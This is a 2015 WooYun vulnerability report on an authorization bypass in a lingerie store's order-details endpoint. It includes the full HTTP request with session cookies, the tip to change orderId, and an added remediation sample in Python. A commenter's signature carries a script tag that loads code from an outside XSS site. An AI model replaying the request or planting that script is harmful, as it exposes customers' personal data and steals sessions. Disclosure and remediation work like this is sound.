
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0124423

Title: 都市丽人 official online store allows viewing other users' order details (phone number, shipping address)

Vendor: 都市丽人 official online store

Author: 碎片

Submitted: 2015-07-04 10:56

Fix deadline: 2015-08-18 10:58

Disclosed: 2015-08-18 10:58

Vulnerability type: Content security

Severity: High

Self-assessed Rank: 15

Status: Vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-07-04: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2015-08-18: The vendor has actively ignored the vulnerability; details are now disclosed to the public

Brief description:

A simple, crude authorization bypass; by the look of it, the entire order is visible, including a girl's underwear size.
A small request: my WooYun registration email has expired, could you help me change it?

Detailed description:

POST /webapp/wcs/stores/servlet/OrderDetailsCmd HTTP/1.1
Host: www.dslrpark.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://www.dslrpark.com/webapp/wcs/stores/servlet/AjaxLogonForm?catalogId=10001&position=1&langId=-7&storeId=10001
Content-Length: 57
Cookie: WPTLNG=1; _adwr=60408235%23http%253A%252F%252Fbzclk.baidu.com%252Fadrc.php%253Ft%253D0fKL00c00fDpow00ylK70jOzU00hdGPN00000n382am00000ILCmQo.THvvEnofs5UczsK85ydEUhkGUhNxP7qbusK15yc4nvDYm1wBnj0snHubn1T0IHdKn1F7nH0LnRc3n1f1nHFDwbPDnWF7nbcvnjfkf1T1w6K95gTqFhdWpyfqnHfLnWT3n16LPzusThqbpyfqnHmhULFG5HDhTLNBULFG5iusThbqn6K-5y9YIZ0lQzqLILT8uZP_TMK9Th_8mvqVQsKWThnqPWRsnHf%2526ie%253Dutf-8%2526f%253D8%2526tn%253Dmonline_4_dg%2526wd%253D%2525E9%252583%2525BD%2525E5%2525B8%252582%2525E4%2525B8%2525BD%2525E4%2525BA%2525BA; Hm_lvt_d63bf9604067cbdd86c4a4ddba0a79b0=1435151189,1435751978; CoreID6=36131358438014329072173&ci=90408287_60408287; JSESSIONID=0000ao6APxVI9DoO_YrSSMSQETN:18eiqe3dv; REFERRER=http%3a%2f%2fbzclk%2ebaidu%2ecom%2fadrc%2ephp%3ft%3d0fKL00c00fDpow00ylK70jOzU00hdGPN00000n382am00000ILCmQo%2eTHvvEnofs5UczsK85ydEUhkGUhNxP7qbusK15yc4nvDYm1wBnj0snHubn1T0IHdKn1F7nH0LnRc3n1f1nHFDwbPDnWF7nbcvnjfkf1T1w6K95gTqFhdWpyfqnHfLnWT3n16LPzusThqbpyfqnHmhULFG5HDhTLNBULFG5iusThbqn6K%2d5y9YIZ0lQzqLILT8uZP%5fTMK9Th%5f8mvqVQsKWThnqPWRsnHf%26ie%3dutf%2d8%26f%3d8%26tn%3dmonline%5f4%5fdg%26wd%3d%25E9%2583%25BD%25E5%25B8%2582%25E4%25B8%25BD%25E4%25BA%25BA; WC_PERSISTENT=al0N8fFFvWd7TId7%2fDLfcwt4wUs%3d%0a%3b2015%2d07%2d01+20%3a01%3a48%2e636%5f1432909525142%2d12%5f10001; cloud=true; _adwb=60408235; _adwc=60408235; _adwp=60408235.9546262271.1432907217.1435154365.1435751978.5; Hm_lpvt_d63bf9604067cbdd86c4a4ddba0a79b0=1435752145; cmTPSet=Y; 90408287_clogin=l=1435751978&v=1&e=1435754141276; alreadyLoaded=true; SLnewses=1; WC_SESSION_ESTABLISHED=true; WC_ACTIVEPOINTER=%2d7%2c10001; 60408287_clogin=l=1435752010&v=1&e=1435753927628; WC_AUTHENTICATION_12197614=12197614%2cqD0bBWfnOAGfNxP7Vt6Mwa4YiiI%3d; 
WC_USERACTIVITY_12197614=12197614%2c10001%2c0%2cnull%2c1435752108647%2c1435754102692%2cnull%2cnull%2cnull%2cnull%2coYOLplIpbICbqJOU1LHTSdH62JUNmBiC9hxoklQRgr8XbbK3QnAeMwuVxA%2bBsIFbPRFTVunsWoew%0alvlEBBUCEd6ZBs3UDI4p0dyDsYbMVIkoie%2bL7G%2bu1s%2fCUrBkWA87Fy%2bVm84nBioYogka%2bI4QKrjQ%0aF0m3gogwcrqxKwKsq6Q%3d; _adwo=60408235.1.900740891
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
orderId=900740537&storeId=10001&catalogId=10001&langId=-7


Modify the orderId= parameter.

Proof of vulnerability:

[Screenshots: 1.png, E5C89FD0-7D21-4326-9314-9141236144C7.png, 2.png, 3.png]

Remediation:

Enforce authorization checks.
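As an added illustration of that remediation (not the vendor's code or the reporter's), here is a minimal Python model of the OrderDetailsCmd lookup: the orderId-only lookup the report describes beside a version scoped to the session user. The Order class, the ORDERS sample data, the phone/address values and the handler names are constructed for illustration; 12197614 is only the user id visible in the cookie above.

```python
from dataclasses import dataclass
from urllib.parse import parse_qs

@dataclass(frozen=True)
class Order:
    order_id: int
    store_id: int
    owner_user_id: int  # customer who placed the order
    phone: str
    address: str

class NotFound(Exception):
    """Raised for a missing order and for an order the caller may not read."""

# Constructed sample data (not real orders): two customers, one order each.
# 12197614 is the user id visible in the report's WC_AUTHENTICATION cookie.
ORDERS = {
    900740537: Order(900740537, 10001, 12197614, "138****0001", "Shenzhen, address A"),
    900740538: Order(900740538, 10001, 22222222, "139****0002", "Guangzhou, address B"),
}

def order_details_vulnerable(order_id: int, store_id: int) -> Order:
    """Looks up by orderId and storeId only: any logged-in user can read any order."""
    order = ORDERS.get(order_id)
    if order is None or order.store_id != store_id:
        raise NotFound(order_id)
    return order

def order_details_fixed(session_user_id: int, order_id: int, store_id: int) -> Order:
    """Scopes the lookup to the caller. The owner id comes from the server-side
    session, never from the request body, and a foreign order fails exactly like
    a missing one so the response does not reveal which orderIds exist."""
    order = ORDERS.get(order_id)
    if order is None or order.store_id != store_id or order.owner_user_id != session_user_id:
        raise NotFound(order_id)
    return order

def handle_order_details(session_user_id: int, form_body: str) -> dict:
    """Endpoint logic for a body like 'orderId=900740537&storeId=10001&catalogId=10001&langId=-7'."""
    params = parse_qs(form_body)
    try:
        order_id = int(params["orderId"][0])
        store_id = int(params["storeId"][0])
    except (KeyError, ValueError):
        return {"status": 400, "error": "bad request"}
    try:
        order = order_details_fixed(session_user_id, order_id, store_id)
    except NotFound:
        return {"status": 404, "error": "order not found"}
    return {"status": 200, "phone": order.phone, "address": order.address}
```

The same test in a real deployment is a two-user check: log in as A, request B's orderId, and expect the same 404 the server gives for a nonexistent order.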

Copyright notice: please credit the source, 碎片@乌云, when reposting


Vulnerability response

Vendor response:

The vendor could not be contacted, or the vendor actively refused

Vulnerability rating:

Comments

  1. 2015-07-04 20:53 | 碎片 ( Passerby | Rank:23 Vulnerabilities:9 | <script src=http://www.xss8.net/?c=MjMf4...)

    @乌云小秘书 My phone number was not blurred out; could you help edit the images?

  2. 2015-07-05 08:09 | 乌云小秘书 Certified white hat ( Regular white hat | No vulnerabilities published yet | No. 1! Never act on impulse! No. 2! Never misjudge any...)

    @碎片 Sure

  3. 2015-07-05 10:33 | 碎片 ( Passerby | Rank:23 Vulnerabilities:9 | <script src=http://www.xss8.net/?c=MjMf4...)

    @乌云小秘书 In figures 1 and 2, my phone number, the string of digits below "real-name verification not yet completed", please blur it, thanks

  4. 2015-07-06 14:16 | 碎片 ( Passerby | Rank:23 Vulnerabilities:9 | <script src=http://www.xss8.net/?c=MjMf4...)

    @乌云小秘书 Please blur the phone number in figures 1 and 2

  5. 2015-07-12 20:38 | 小贱 ( Passerby | Rank:5 Vulnerabilities:2 | I'm just a little rookie, flying and flying along)

    @碎片 Damn, you've seen the underwear I bought... how embarrassing

  6. 2015-07-15 15:25 | 乌云小秘书 Certified white hat ( Regular white hat | No vulnerabilities published yet | No. 1! Never act on impulse! No. 2! Never misjudge any...)

    @碎片 Done